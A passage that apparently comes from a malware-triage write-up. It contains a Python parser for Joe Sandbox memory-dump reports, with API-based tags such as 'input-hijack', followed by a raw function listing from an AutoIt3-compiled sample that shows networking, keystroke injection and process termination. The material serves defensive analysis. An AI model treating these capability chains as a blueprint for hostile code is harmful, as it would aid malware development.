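• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• Instruction Fuzzy Hash: 4D316471540604AFF7729F65CA88AAF7BFCFB49644F04851EF4C6D2204DB39DA048B61
APIs
• GetCurrentThreadId.KERNEL32 ref: 0100B151
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B165
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B17B
  • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
Memory Dump Source
• Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Similarity
• String ID: close all
• Instruction Fuzzy Hash: 5B31D079900204BFFB379F28D948BAD7BADBB55311F104445FA80EA1C4D7B9A8409FA0
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function XXXX:" for calls made by a callee.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
BASE_RE = re.compile(r"Offset:\s*(?P<base>[0-9A-Fa-f]+)")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                            # call-site VA as printed by the report
    subcall_of: Optional[str] = None    # set when the call is inside a callee

@dataclass
class FuncEntry:
    apis: list = field(default_factory=list)
    string_ids: list = field(default_factory=list)
    fuzzy_hash: Optional[str] = None
    base: Optional[int] = None          # module load base from "Offset:"

    def rva(self, call: ApiCall) -> Optional[int]:
        return None if self.base is None else call.ref - self.base

def parse_entries(text: str) -> list:
    """Split the listing on 'APIs' headers and collect calls and metadata."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FuncEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            cur.apis.append(ApiCall(m.group("api"), m.group("mod"), args,
                                    int(m.group("ref"), 16), m.group("sub")))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m.group("key").strip(), m.group("val").strip()
        if key == "Source File":
            b = BASE_RE.search(val)
            cur.base = int(b.group("base"), 16) if b else None
        elif key == "String ID":
            cur.string_ids = [s for s in val.split("$") if s]   # '$'-separated
        elif key == "Instruction Fuzzy Hash":
            cur.fuzzy_hash = val
    return entries

# Triage tags: this example's own grouping, not categories from the report.
MODULE_TAGS = {"WININET": "network", "WS2_32": "network", "WINMM": "media"}
API_TAGS = {"AttachThreadInput": "input-hijack", "GetAsyncKeyState": "input-hijack",
            "CoCreateInstance": "com"}

def classify(entry: FuncEntry) -> set:
    """Tag a function by the modules and APIs it calls directly (subcalls excluded)."""
    tags = set()
    for call in entry.apis:
        if call.subcall_of:
            continue
        if call.module in MODULE_TAGS:
            tags.add(MODULE_TAGS[call.module])
        if call.name in API_TAGS:
            tags.add(API_TAGS[call.name])
    return tags

def summarize(entries: list) -> list:
    """One line per function: RVA of its first direct call, tags, API chain."""
    out = []
    for e in entries:
        direct = [c for c in e.apis if not c.subcall_of]
        if not direct:
            continue
        rva = e.rva(direct[0])
        loc = f"rva=0x{rva:X}" if rva is not None else "rva=?"
        out.append(f"{loc} {sorted(classify(e))} " + " -> ".join(c.name for c in direct))
    return out

if __name__ == "__main__":
    for line in summarize(parse_entries(SAMPLE)):
        print(line)
```

The RVA is what you need to find the same function in the dumped PE or in a clean AutoIt3 interpreter: strings such as `>>>AUTOIT SCRIPT<<<` and `Line %d (File "%s"):` in the entries above are the interpreter's own error-reporting text, so a matching RVA in a clean AutoIt3.exe confirms a function is runtime code rather than script-specific logic and lets you skip it during triage.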
            APIs
            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FE3AAF,?,?,Bad directive syntax error,0103CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 010098BC
            • LoadStringW.USER32(00000000,?,00FE3AAF,?), ref: 010098C3
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 01009987
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: HandleLoadMessageModuleString_wcslen
            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
            • API String ID: 858772685-4153970271
            • Opcode ID: c67ae91fc7cb3393511ee1e00e73c4c658dd0a6c59e766776a32ff2f59dced79
            • Instruction ID: 61e3b7502934734a3470a984a7b9b946fa3041508f2eaacad9241a1539c08aed
            • Opcode Fuzzy Hash: c67ae91fc7cb3393511ee1e00e73c4c658dd0a6c59e766776a32ff2f59dced79
            • Instruction Fuzzy Hash: A221E172C0421ABBDF12AF91CC06EEE7779FF19304F04442AF55576092EB79A618EB50
            APIs
            • GetParent.USER32 ref: 010020AB
            • GetClassNameW.USER32(00000000,?,00000100), ref: 010020C0
            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0100214D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ClassMessageNameParentSend
            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
            • API String ID: 1290815626-3381328864
            • Opcode ID: 5162abc3071aa55e7c8f65fec153e3c2fd8543af290b7f7f82b4f031bd6a519f
            • Instruction ID: d9459a55abb53c5ba96b63ce9bb790068d831d759ddf2ceee46fcf294878dd62
            • Opcode Fuzzy Hash: 5162abc3071aa55e7c8f65fec153e3c2fd8543af290b7f7f82b4f031bd6a519f
            • Instruction Fuzzy Hash: 93113A7A284307B9F6172524DC0BDEA73DCCB14364F10105AF784A80D2FA6974016A14
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
            • String ID:
            • API String ID: 1282221369-0
            • Opcode ID: bc4a5c4d6f03a810ca69b3a02f4601aebaa46970a0c3800a4fdfd1714d0534c6
            • Instruction ID: e8e5ea731a92e753d8c303795a0a265f58fac28eeef171a290bf1a7cd4b29045
            • Opcode Fuzzy Hash: bc4a5c4d6f03a810ca69b3a02f4601aebaa46970a0c3800a4fdfd1714d0534c6
            • Instruction Fuzzy Hash: 2761C472D04302ABDB21AF649845AAD7BA7AF05320F0C416BF945A7385D63A9D01F7E1
            APIs
            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 01035186
            • ShowWindow.USER32(?,00000000), ref: 010351C7
            • ShowWindow.USER32(?,00000005,?,00000000), ref: 010351CD
            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 010351D1
              • Part of subcall function 01036FBA: DeleteObject.GDI32(00000000), ref: 01036FE6
            • GetWindowLongW.USER32(?,000000F0), ref: 0103520D
            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0103521A
            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0103524D
            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 01035287
            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 01035296
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
            • String ID:
            • API String ID: 3210457359-0
            • Opcode ID: 73e9e0c422baed7ff1b86e8fa0f60dc98f1a80b5c6777b8e0484e97d1a7ee089
            • Instruction ID: 57029ee4a0dacbb3a48d67e1250a34606cadc587e0cfe037db5deed341dee691
            • Opcode Fuzzy Hash: 73e9e0c422baed7ff1b86e8fa0f60dc98f1a80b5c6777b8e0484e97d1a7ee089
            • Instruction Fuzzy Hash: F051B330A40209BFFF709E29CC45BD83BADFB86321F144452FA95A62F0D775A590DB41
            APIs
            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00FF6890
            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00FF68A9
            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FF68B9
            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00FF68D1
            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FF68F2
            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00FF6901
            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FF691E
            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00FF692D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Icon$DestroyExtractImageLoadMessageSend
            • String ID:
            • API String ID: 1268354404-0
            • Opcode ID: b1000483d2c70ca9dfc0403c55d8106a1a92f3298fea234972f0631ba89f8d43
            • Instruction ID: 50ebd9e9673b99c639d7f3788e12d56319b1712eb64f00de360c2f5f26c44714
            • Opcode Fuzzy Hash: b1000483d2c70ca9dfc0403c55d8106a1a92f3298fea234972f0631ba89f8d43
            • Instruction Fuzzy Hash: 92517F71A00209AFDB20CF25CC45BAA7BB9FF84760F108518F952E72D0DB75E951EB50
            APIs
            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0101C182
            • GetLastError.KERNEL32 ref: 0101C195
            • SetEvent.KERNEL32(?), ref: 0101C1A9
              • Part of subcall function 0101C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0101C272
              • Part of subcall function 0101C253: GetLastError.KERNEL32 ref: 0101C322
              • Part of subcall function 0101C253: SetEvent.KERNEL32(?), ref: 0101C336
              • Part of subcall function 0101C253: InternetCloseHandle.WININET(00000000), ref: 0101C341
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
            • String ID:
            • API String ID: 337547030-0
            • Opcode ID: 21331bb4304f25cd95ace075bdc5c571bb0c4e7061923fb8b64de212839c8acd
            • Instruction ID: 82c5a7dd55322169ed1508051f912d850503005585aea75221f3b05f83a22c30
            • Opcode Fuzzy Hash: 21331bb4304f25cd95ace075bdc5c571bb0c4e7061923fb8b64de212839c8acd
            • Instruction Fuzzy Hash: F5319471180641AFFB219FA5DA44AAABBFCFF19300B04441EF9DAD3608D739E414DB60
            APIs
              • Part of subcall function 01003A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01003A57
              • Part of subcall function 01003A3D: GetCurrentThreadId.KERNEL32 ref: 01003A5E
              • Part of subcall function 01003A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010025B3), ref: 01003A65
            • MapVirtualKeyW.USER32(00000025,00000000), ref: 010025BD
            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 010025DB
            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 010025DF
            • MapVirtualKeyW.USER32(00000025,00000000), ref: 010025E9
            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 01002601
            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 01002605
            • MapVirtualKeyW.USER32(00000025,00000000), ref: 0100260F
            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 01002623
            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 01002627
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
            • String ID:
            • API String ID: 2014098862-0
            • Opcode ID: 2bc059c32ce65ac7818022f8097e9f7f864a61d5e6f95be8b6d92d63c6f61ce5
            • Instruction ID: 232c98ea677efe5568f02f2815809b1e732f447071121b97037670b970260403
            • Opcode Fuzzy Hash: 2bc059c32ce65ac7818022f8097e9f7f864a61d5e6f95be8b6d92d63c6f61ce5
            • Instruction Fuzzy Hash: 1001D431790210BBFB2166689C8EF993F5DEB4FB12F100012F398FE0C4C9F224449A69
            APIs
            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,01001449,?,?,00000000), ref: 0100180C
            • HeapAlloc.KERNEL32(00000000,?,01001449,?,?,00000000), ref: 01001813
            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01001449,?,?,00000000), ref: 01001828
            • GetCurrentProcess.KERNEL32(?,00000000,?,01001449,?,?,00000000), ref: 01001830
            • DuplicateHandle.KERNEL32(00000000,?,01001449,?,?,00000000), ref: 01001833
            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01001449,?,?,00000000), ref: 01001843
            • GetCurrentProcess.KERNEL32(01001449,00000000,?,01001449,?,?,00000000), ref: 0100184B
            • DuplicateHandle.KERNEL32(00000000,?,01001449,?,?,00000000), ref: 0100184E
            • CreateThread.KERNEL32(00000000,00000000,01001874,00000000,00000000,00000000), ref: 01001868
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
            • String ID:
            • API String ID: 1957940570-0
            • Opcode ID: 494950d9e6958390321f808ae4af244ceaa72c4f489d7eca2bfac18b5794f046
            • Instruction ID: 7b3d01291db1fb287dcbd5acf9b01b8e63e55b58a7cda95a9993cecac5cd6bdd
            • Opcode Fuzzy Hash: 494950d9e6958390321f808ae4af244ceaa72c4f489d7eca2bfac18b5794f046
            • Instruction Fuzzy Hash: FA01BBB5240308BFF720ABA5DD4DF6B3BACEB8AB11F004411FA45EB195CA75D810DB20
            APIs
              • Part of subcall function 0100D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0100D501
              • Part of subcall function 0100D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0100D50F
              • Part of subcall function 0100D4DC: CloseHandle.KERNEL32(00000000), ref: 0100D5DC
            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0102A16D
            • GetLastError.KERNEL32 ref: 0102A180
            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0102A1B3
            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0102A268
            • GetLastError.KERNEL32(00000000), ref: 0102A273
            • CloseHandle.KERNEL32(00000000), ref: 0102A2C4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
            • String ID: SeDebugPrivilege
            • API String ID: 2533919879-2896544425
            • Opcode ID: 572497efbb95546bc181753db6d2c1715332b461e627b2f038c0ff1f6350d273
            • Instruction ID: 6aab489ee5b7726876e172695365ce48603e8736cffea6632bf974d1b2c34600
            • Opcode Fuzzy Hash: 572497efbb95546bc181753db6d2c1715332b461e627b2f038c0ff1f6350d273
            • Instruction Fuzzy Hash: 3361B170204252DFE720DF18C894F19BBE5AF45318F18849CE5A68BB93CB76ED49CB91
            APIs
            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01033925
            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0103393A
            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01033954
            • _wcslen.LIBCMT ref: 01033999
            • SendMessageW.USER32(?,00001057,00000000,?), ref: 010339C6
            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 010339F4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$Window_wcslen
            • String ID: SysListView32
            • API String ID: 2147712094-78025650
            • Opcode ID: 1fa8b116d2b39bda9a3c810fa9fb1df1ea98d8d4682add0f1c51fa48c55bf23f
            • Instruction ID: 8d8d33b669b8a2e8c65fbfac37d807777080655985e84901f4e7589493f3f504
            • Opcode Fuzzy Hash: 1fa8b116d2b39bda9a3c810fa9fb1df1ea98d8d4682add0f1c51fa48c55bf23f
            • Instruction Fuzzy Hash: 8C419371A00319ABEB219F64CC85FEA7BADFF48354F10056AF994EB281D7759980CB90
            APIs
            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0100BCFD
            • IsMenu.USER32(00000000), ref: 0100BD1D
            • CreatePopupMenu.USER32 ref: 0100BD53
            • GetMenuItemCount.USER32(011E6BB0), ref: 0100BDA4
            • InsertMenuItemW.USER32(011E6BB0,?,00000001,00000030), ref: 0100BDCC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Menu$Item$CountCreateInfoInsertPopup
            • String ID: 0$2
            • API String ID: 93392585-3793063076
            • Opcode ID: 698a508b85504ebfcc435af5427ec937b1e22bd8878700caaab833d2e9bf808d
            • Instruction ID: 82f16abe32b70f79caa35db9b7e1972ec25947442c5dc349faa93988248348b0
            • Opcode Fuzzy Hash: 698a508b85504ebfcc435af5427ec937b1e22bd8878700caaab833d2e9bf808d
            • Instruction Fuzzy Hash: 1A51A174600206DBFB22EFA8C984BADFFF4AF45314F1441AAE591E72D1E7709540CB52
            APIs
            • LoadIconW.USER32(00000000,00007F03), ref: 0100C913
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: IconLoad
            • String ID: blank$info$question$stop$warning
            • API String ID: 2457776203-404129466
            • Opcode ID: 261608bcfe48a5ffef125cc8159f137882a07406ff33d5337d1d15fb3a8b7034
            • Instruction ID: 533f41c8257b82a6fe11597731749a79f08968db4ec16b4def624034b9a01b6d
            • Opcode Fuzzy Hash: 261608bcfe48a5ffef125cc8159f137882a07406ff33d5337d1d15fb3a8b7034
            • Instruction Fuzzy Hash: 50112B31689307BAF7175B549E83DAE37DCDF05320F1001AEF984A61C2E7796E006368
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$LocalTime
            • String ID:
            • API String ID: 952045576-0
            • Opcode ID: a0114d22d4159d4ebfbb159f36d1810d02f6713dfb1e387a1cea2583e232055d
            • Instruction ID: 7e3c91f2f7d1a5d0391d1b0feb2755ce2dbfd9019856cc9dc5daa1e6b8a1c020
            • Opcode Fuzzy Hash: a0114d22d4159d4ebfbb159f36d1810d02f6713dfb1e387a1cea2583e232055d
            • Instruction Fuzzy Hash: 7941A065C1021975DB11EBB4CD8BECFB7A8AF45310F40886AE618F3562FB38E245C3A5
            APIs
            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00FF682C,00000004,00000000,00000000), ref: 00FBF953
            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00FF682C,00000004,00000000,00000000), ref: 00FFF3D1
            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00FF682C,00000004,00000000,00000000), ref: 00FFF454
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ShowWindow
            • String ID:
            • API String ID: 1268545403-0
            • Opcode ID: 2f7bf70bd5998e09c7c434a2d7af98154394fc214e35ee6c3253bb684456c35e
            • Instruction ID: 95b5538a4487a7b602d720314f38f5d8e6a8a17e0ff41e9c0cef3754ea59f958
            • Opcode Fuzzy Hash: 2f7bf70bd5998e09c7c434a2d7af98154394fc214e35ee6c3253bb684456c35e
            • Instruction Fuzzy Hash: 30413D32908644FAD7398B2ACD887BA7B95BF56320F14443DE18762564C636988CFF11
            APIs
            • DeleteObject.GDI32(00000000), ref: 01032D1B
            • GetDC.USER32(00000000), ref: 01032D23
            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01032D2E
            • ReleaseDC.USER32(00000000,00000000), ref: 01032D3A
            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01032D76
            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01032D87
